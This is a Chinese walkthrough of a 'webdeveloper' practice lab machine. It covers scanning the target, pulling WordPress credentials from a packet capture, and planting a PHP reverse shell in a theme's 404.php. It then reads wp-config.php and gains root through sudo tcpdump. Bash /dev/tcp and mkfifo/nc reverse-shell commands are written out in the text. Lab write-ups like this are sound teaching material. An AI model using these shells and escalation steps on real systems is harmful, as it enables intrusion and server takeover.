webdeveloper靶机

admin 2025年1月25日01:58:37评论6 views字数 2296阅读7分39秒阅读模式

webdeveloper靶机详解

  • 信息搜集
    • 主机发现
    • 端口检测
    • 目录扫描
    • wireshark
  • 漏洞利用
    • 木马注入(未成功)
    • 反弹shell
    • ssh连接
    • 提权

信息搜集

主机发现

webdeveloper靶机
image-20250124102503905

端口检测

webdeveloper靶机
image-20250124102652389

目录扫描

webdeveloper靶机
image-20250124102748103

访问网站,发现有个登录框网页

webdeveloper靶机
image-20250124102858869

因为是wordpress登录页面,对其进行爆破

webdeveloper靶机

得到用户名是webdeveloper,因为密码字典太大了,不容易爆破,看看其他的有没有有效信息

wireshark

在目录扫描中发现一个有效目录

 http://192.168.213.159/ipdata/
webdeveloper靶机
image-20250124103441074

因为wordpress登录基本都是post请求包,我们只用分析这些就好了

webdeveloper靶机
image-20250124103807395

得到用户账户webdeveloper 密码Te5eQg&4sBS!Yr$)wf%(DcAd

漏洞利用

木马注入(未成功)

插入一句话木马

在plugins处插入一句话木马,文件顺利保存

webdeveloper靶机
image-20250124105018319

但蚁剑连接不上。放弃

反弹shell

在Appearance页面的editor的404.php处可以插入php反弹shell源代码(在kali的/usr/share/webshells/php中)

插入的时候会有这样的报错

webdeveloper靶机
image-20250124151151038

我们换一个模板再对其进行插入

webdeveloper靶机
image-20250124151242870

然后再把这个模板激活,那如何触发404.php呢,需要我们访问一个不存在的页面,,kali开启监听,成功反弹shell

webdeveloper靶机
image-20250124151530470

该终端只有python3,美化一下终端

python3 -c 'import pty; pty.spawn("/bin/bash")'

ssh连接

我们不知道该账户密码,所以不能用sudo -l,我们可以看一下有没有mysql进程,或者find找一下有root权限的文件,但并无有效信息

ps -aux|grep mysqlfind / -user root -perm /40002>/dev/null    

我们还可以进入网站根目录,看看是否可以找到配置文件,这里面可能存有账户密码

cd /var/www/htmlcat wp-config.php
webdeveloper靶机

果然有  账户 webdeveloper 密码MasterOfTheUniverse,试试mysql连接

mysql -h localhost -u webdeveloper -p MasterOfTheUniverse

连接不上,不知道为啥,再试试ssh连接

webdeveloper靶机
image-20250124152946597

既然知道密码,我们sudo -l试一下

webdeveloper靶机
image-20250124153113374

提示到这,那我们就可以进行/tcp/dump提权

提权

在提权网站上搜到如下脚本

webdeveloper靶机
image-20250124153238681
COMMAND='id'TF=$(mktemp)echo"$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
webdeveloper靶机
image-20250124153658801

一直回显不出来,换个网卡试试

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
webdeveloper靶机
image-20250124153817824

有回显,那说明命令没问题,并且返回root,尝试获取shell

COMMAND='/bin/bash'TF=$(mktemp)echo "$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

回显不出来,那我们反弹shell试一下

COMMAND='/bin/bash -i >& /dev/tcp/192.168.213.154/6666 0>&1'TF=$(mktemp)echo "$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

这个也不行,靶机上也没有nc- e选项,试试rm

COMMAND='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.213.159 6666 >/tmp/f'TF=$(mktemp)echo "$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
webdeveloper靶机
image-20250124154058290

这个也没有回显。再想想。刚才我们不是在一个网页添加了一个反弹shell代码吗?我们执行一下那个代码不就行了

COMMAND='php /var/www/html/wp-content/themes/twentyfifteen/404.php'TF=$(mktemp)echo "$COMMAND" > $TFchmod +x $TFsudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

注意kali开启监听

webdeveloper靶机
image-20250124154758535

成功提权

原文始发于微信公众号(泷羽Sec-山然):webdeveloper靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月25日01:58:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   webdeveloper靶机https://cn-sec.com/archives/3671183.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息